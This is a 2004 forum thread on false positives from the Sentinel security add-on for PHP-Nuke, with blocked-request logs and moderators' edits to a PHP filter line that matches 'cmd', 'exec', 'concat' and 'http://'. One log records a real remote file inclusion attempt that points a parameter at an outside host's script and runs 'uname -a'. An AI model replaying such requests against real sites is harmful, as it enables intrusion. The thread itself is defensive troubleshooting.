False Positive

Posted: Fri Jun 04, 2004 3:04 am

Greetings Raven and all,
I installed Senitinal Last night. This morning I went to upload some new pictures to my site BOOM....I got the FULL effect. It does work!

I have the report it generated and info on excatly what I was doing hen it kicked in....I assume you would be interested in seeing it.

Where would you like the details sent to?

Dawg

Posted: Fri Jun 04, 2004 3:07 am

You may just post the info here.. Leaving the site name and other personal info out..

Posted: Fri Jun 04, 2004 3:45 am

I have had 3 so far...It seems every time I touch "Gallery" to do "Admin" type funstions it fires off....

Here is 1....

Date & Time: 2004-06-04 01:44:40
Blocked IP:
User ID: ME (9 Cool

Reason: Abuse - OTHER
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Query String: www.mysite.com/modules.php?parentName=album35&return=modules.php%3Fop%3Dmodload%26name%3Dgallery%26file%3Dindex%26include%3Dview_album.php&cmd=new-album&op=modload&name=gallery&file=index&include=do_command.php
Forwarded For: none
Client IP: none
Remote Address:
Remote Port: 1780
Request Method: GET

#2........

Date & Time: 2004-06-04 01:54:33
Blocked IP:
User ID: ME (9 Cool

Reason: Abuse - OTHER
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Query String: www.mysite.com/modules.php?parentName=album35&return=modules.php%3Fop%3Dmodload%26name%3Dgallery%26file%3Dindex%26include%3Dview_album.php&cmd=new-album&op=modload&name=gallery&file=index&include=do_command.php
Forwarded For: none
Client IP: none
Remote Address:
Remote Port: 1222
Request Method: GET

#3
Date & Time: 2004-06-04 02:10:40
Blocked IP:
User ID: ME (9 Cool

Reason: Abuse - OTHER
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Query String: www.mysite.com/modules.php?cmd=highlight&index=6&set_albumName=album55&op=modload&name=gallery&file=index&include=do_command.php
Forwarded For: none
Client IP: none
Remote Address:
Remote Port: 1985
Request Method: GET

#4....
Date & Time: 2004-06-04 02:10:55
Blocked IP:
User ID: ME (9 Cool

Reason: Abuse - OTHER
--------------------
User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Query String: www.MYSITE.com/modules.php?cmd=highlight&index=6&set_albumName=album55&op=modload&name=gallery&file=index&include=do_command.php
Forwarded For: none
Client IP: none
Remote Address:
Remote Port: 2038
Request Method: GET

There are the 4 so far. Like I said It seems to fire off anytime I use the admin fuctions in Gallery.

I am using ver 1.1 BTW.

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

It's the &cmd value that is setting it off. We'll have to look into it. Thanks!

New Member Joined: Jan 22, 2004 Posts: 9

After seeing this I checked gallery also and got banned when I tried to rebuild the thumbnails.

I had Sentinel 1.10 installed and then seen 1.20 was out so I installed it and got banned again.

I had not tried the ban function, but I see what it does now. Its great, even though as some have warned it did not crash my computer. I shut off my pop up blocker and was able to hit Alt&Ctrl&Delete and close it out, of course I was expecting it.

Can you tell me which function would control this so I can disable it for now, since I don't want a member to get accidently banned.

Thanks

Posted: Fri Jun 04, 2004 7:02 am

Rather than turn it completely off which could leave you vulnerable, try this first. Find this code on or about line 109 in includes/sentinel.php

Code:

  if (eregi("http\:\/\/", $name) OR eregi("cmd",$querystring) OR eregi("exec",$querystring) OR eregi("concat",$querystring)) {

and modify it to

Code:

  if (eregi("http\:\/\/", $name) OR (eregi("cmd",$querystring) AND !eregi("&cmd",$querystring)) OR eregi("exec",$querystring) OR eregi("concat",$querystring)) {

Posted: Fri Jun 04, 2004 7:04 am

Figured it out, its the string query that is setting it off.

I shut it off and was able to admin gallery.

Posted: Fri Jun 04, 2004 7:18 am

Of course this is what is causing it in the sentinel.php "OR eregi("cmd",$querystring)" because I removed it, enabled the query string again, and was able to admin the gallery without being banned.

Is it possible to rewrite it so admin's or approved members can use the gallery functions but anyone else it would set off the ban.

Thanks

Posted: Fri Jun 04, 2004 7:19 am

Sorry Raven, you must have been posting while I was.

Thanks

Posted: Fri Jun 04, 2004 7:25 am

That fix did it, I didn't get banned for rebuilding the thumbs this time.

Posted: Fri Jun 04, 2004 7:25 pm

Raven,
Will this work for anyone with "Photo" access or just an admin?

I give Photo Galleries to my registered members. (I run a Sport Fishing Site) and The members that use this feature have control over their own gallery. Will this work? or will they be banned?

Dawg

Posted: Fri Jun 04, 2004 7:28 pm

It should work for any uri request_stirng containing &cmd

Posted: Sat Jun 05, 2004 1:12 pm

Code:

Date & Time: 2004-06-05 19:14:44


Blocked IP: ********


User ID: executer (992)


Reason: Abuse - OTHER


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.mysite.com/modules.php?name=Your_Account&op=userinfo&bypass=1&username=executer


Forwarded For: *******


Client IP: none


Remote Address: *********


Remote Port: 26215


Request Method: GET

Posted: Sat Jun 05, 2004 4:29 pm

Its the username exec is a substring of executer
You'll have to decide either to remove the exec code or set the filter to email only for now.

Posted: Sat Jun 05, 2004 5:34 pm

Building on what Raven did with cmd above NovemberRain try this its working ok for me but I only tested it briefly.
Around line 112 in includes/sentinel.php
change this line
if (eregi("http\:\/\/", $name) OR eregi("cmd",$querystring) OR eregi("exec",$querystring) OR eregi("concat",$querystring)) {
To this:

Code:




 if (eregi("http\:\/\/", $name) OR (eregi("cmd",$querystring) AND !eregi("&cmd",$querystring)) OR eregi("exec",$querystring) AND !eregi("execu",$querystring) OR eregi("concat",$querystring)) {

Hangin' Around Joined: Mar 22, 2004 Posts: 49

I got this one today...

Code:

X-Mailer: Sentinel™ 


Date: Sat, 05 Jun 2004 18:02:03 +0100 














Date & Time: 2004-06-05 18:02:03


Blocked IP: 81.0.234.209


User ID: Anonymous (1)


Reason: Abuse - OTHER


--------------------


User Agent: Python-urllib/1.15


Query String: www.mydublin.org/crew/modules.php?name=http://sweb.cz/sheepland/cmd&cmd=uname+-a


Forwarded For: none


Client IP: none


Remote Address: 81.0.234.209


Remote Port: 56335


Request Method: GET


--------------------


Who-Is for IP


81.0.234.209

Is that the same as what others said above ? Or was it really a hack/exploit attempt ?

Ta,

Trev.

Posted: Sat Jun 05, 2004 5:59 pm

Trev,
That was a legit attack.

Posted: Sat Jun 05, 2004 6:00 pm

Thanks six Smile

Posted: Sat Jun 05, 2004 6:05 pm

Grr and your attacker while stupid enough to leave indexing on encoded his variable names lol!!!!!

Regular Joined: Aug 22, 2003 Posts: 84

A valid user got this:

Reason: Abuse - SCRIPT

Query String: www.blah.com/modules.php?name=Web_Links&l_op=viewlinkdetails&lid=96&ttitle=Cube-Tec_(formerly_Spectral_Design)
Forwarded For: none
Client IP: none
Remote Address: 213.217.**.*
Remote Port: 56473
Request Method: GET

Embarassed

Posted: Sun Jun 06, 2004 11:46 am

Yep thats the () in the title. This has been reported we're looking into options to qualify the filter but there are so many potential mis uses its hard to create something that is going to still catch all the evil. Yet allow the good ones through while maintaining an acceptable level of performance.

Its best to just not allow them.

Posted: Sun Jun 06, 2004 12:56 pm

I agree with Six. You could also just set the setting to E-Mail only and that way you can look at each occurrence and respond accordingly. I'd just avoid the () in my titles Smile

Posted: Tue Jun 15, 2004 9:54 am

Code:

Date & Time: 2004-06-15 13:57:31


Blocked IP: **.***.****


User ID: Joe_Sadriabi (102)


Reason: Abuse - SCRIPT


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.xxxx.com/modules.php?op=modload&name=Kalender&file=submit


Forwarded For:xxxxx


Client IP: none


Remote Address: xxxxxx


Remote Port: 41499


Request Method: POST


--------------------


Who-Is for IP


xxxxxxxxx

Code:

Date & Time: 2004-06-15 14:12:10


Blocked IP: xxxxxxxxx


User ID: Joe_Sadriabi (102)


Reason: Abuse - SCRIPT


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.xxxxxx.com/modules.php?name=Submit_News


Forwarded For: xxxxxxxxxxx


Client IP: none


Remote Address: xxxxxxxxxx


Remote Port: 50165


Request Method: POST


--------------------


Who-Is for IP


xxxxxx

Code:

Date & Time: 2004-06-15 14:13:05


Blocked IP: xxxxxxxx


User ID: Joe_Sadriabi (102)


Reason: Abuse - SCRIPT


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Query String: www.xxxxxx.com/modules.php?name=Submit_News


Forwarded For: xxxxxxx


Client IP: none


Remote Address: xxxxxxxx


Remote Port: 57845


Request Method: POST


--------------------


Who-Is for IP


xxxxxxxxx

Posted: Tue Jun 15, 2004 3:01 pm

Code:

Date & Time: 2004-06-15 23:40:15


Blocked IP: xxxxxxxx


User ID: cmdmrr (4368)


Reason: Abuse - OTHER


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Query String: www.xxxx.com/modules.php?name=Your_Account&op=userinfo&bypass=1&username=cmdmrr


Forwarded For: none


Client IP: none


Remote Address: xxxxxxxxxxx


Remote Port: 1408


Request Method: GET


--------------------


Who-Is for IP


xxxxxxx

Posted: Tue Jun 15, 2004 3:11 pm

This last one is answered in this very thread on this very page, up above.